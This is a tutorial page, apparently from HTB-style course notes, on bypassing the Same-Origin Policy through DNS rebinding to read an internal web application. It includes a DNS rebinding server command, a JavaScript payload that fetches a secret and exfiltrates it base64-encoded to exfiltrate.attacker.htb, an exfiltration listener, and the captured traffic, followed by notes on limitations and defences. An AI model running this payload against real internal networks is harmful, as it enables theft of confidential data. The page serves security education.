SOP Bypass

Having understood how to bypass SSRF filters with DNS rebinding, in this section we will utilize it to circumvent some of the restrictions imposed by the Same-Origin policy, thereby enabling us to access web applications available only within the victim's local network and exfiltrate data from them.

Setting & Methodology

Goal: Exfiltrate data from a web application that we cannot directly access (e.g., runs on internal network behind NAT/firewall).

Attack Scenario

Victim is browsing internet on work laptop within company network
Internal web application at http://192.168.178.1/ contains confidential information
Application is only accessible within the company's internal network

Attack Chain

┌─────────────────────────────────────────────────────────────────────────┐
│                        DNS Rebinding Attack Flow                         │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                         │
│  1. Attacker configures attacker.htb → 9.9.9.9 (attacker server)       │
│                                                                         │
│  2. Victim visits http://attacker.htb                                  │
│     └── DNS resolves to 9.9.9.9                                        │
│     └── Malicious JavaScript payload loaded                            │
│                                                                         │
│  3. Attacker rebinds DNS: attacker.htb → 192.168.178.1                 │
│                                                                         │
│  4. JavaScript makes GET request to http://attacker.htb/secret         │
│     └── DNS now resolves to 192.168.178.1 (internal app)               │
│     └── Same origin (scheme, host, port) → No SOP violation!           │
│     └── JavaScript can access the response                             │
│                                                                         │
│  5. Payload exfiltrates response to http://exfiltrate.attacker.htb     │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

Important: The port the internal web application runs on must be the same as the attacker web application to ensure the origin matches. The attacker must know the IP address and port beforehand.

Exploitation

Internal Web Application (Target)

router.get("/secret", async (req, res) => {
    return res.status(200).send("This is secret data!");
});

No authentication required - sysadmin assumed internal network = safe (wrong!).

Start DNS Rebinding Server

sudo python3 dnsrebinder.py --domain www.attacker.htb. --rebind 192.168.178.1 --ip $PUBLIC_WEBSERVER_IP --counter 1 --tcp --udp

Starting nameserver...
UDP server loop running in thread: Thread-1
TCP server loop running in thread: Thread-2

Malicious JavaScript Payload

Host this on your web server:

<script>
    startAttack();

    function startAttack(){
        var xhr = new XMLHttpRequest();
        xhr.open('GET', 'http://www.attacker.htb/secret', true);
        xhr.onload = () => {
          fetch('http://exfiltrate.attacker.htb:1337/log?data=' + btoa(xhr.response));
        };
        xhr.send();

    setInterval(startAttack, 2000);
    }
</script>

The payload calls itself every 2 seconds to increase probability of successful attack.

Start Exfiltration Server

python3 -m http.server 1337

Results

When victim accesses http://www.attacker.htb:

Request to internal app (in Burp):

GET /secret HTTP/1.1
Host: www.attacker.htb

Response:

This is secret data!

Exfiltration request:

GET /log?data=VGhpcyBpcyBzZWNyZXQgZGF0YSE= HTTP/1.1
Host: exfiltrate.attacker.htb:1337
Origin: http://www.attacker.htb
Referer: http://www.attacker.htb/

Base64 decoded: This is secret data!

Restrictions

Authentication Protection

Internal applications protected by authentication are safe from DNS rebinding attacks because:

Session cookies are NOT sent with requests
Browser thinks it's communicating with http://attacker.htb
Sends cookies associated with attacker.htb origin
Cookies for http://192.168.178.1 are NOT sent (different origin)

Result: Attackers cannot perform authenticated actions unless they have valid credentials.

DNS Caching

Modern browsers implement DNS caching regardless of actual TTL:

Must wait for caching period before DNS rebinding succeeds
That's why our payload calls itself every 2 seconds
Firefox: network.dnsCacheExpiration setting alters caching period

Local Network Access (WC3 Draft Specification - 2023)

New HTTP headers under development:

Header

Purpose

Access-Control-Request-Local-Network

Set by browser if origin's IP makes request to less public IP

Access-Control-Allow-Local-Network

Set by web app if response can be shared with external networks

"Less public" definition:

If origin is not localhost → any localhost IP (e.g., 127.0.0.1)
If origin is public → any private IP address

This prevents DNS rebinding by considering the actual IP address the origin resolves to when making a request.

PreviousDNS Rebinding SSRF Bypass NextTools & Prevention

Last updated 1 month ago

hashtagSetting & Methodology

hashtagAttack Scenario

hashtagAttack Chain

hashtagExploitation

hashtagInternal Web Application (Target)

hashtagStart DNS Rebinding Server

hashtagMalicious JavaScript Payload

hashtagStart Exfiltration Server

hashtagResults

hashtagRestrictions

hashtagAuthentication Protection

hashtagDNS Caching

hashtagLocal Network Access (WC3 Draft Specification - 2023)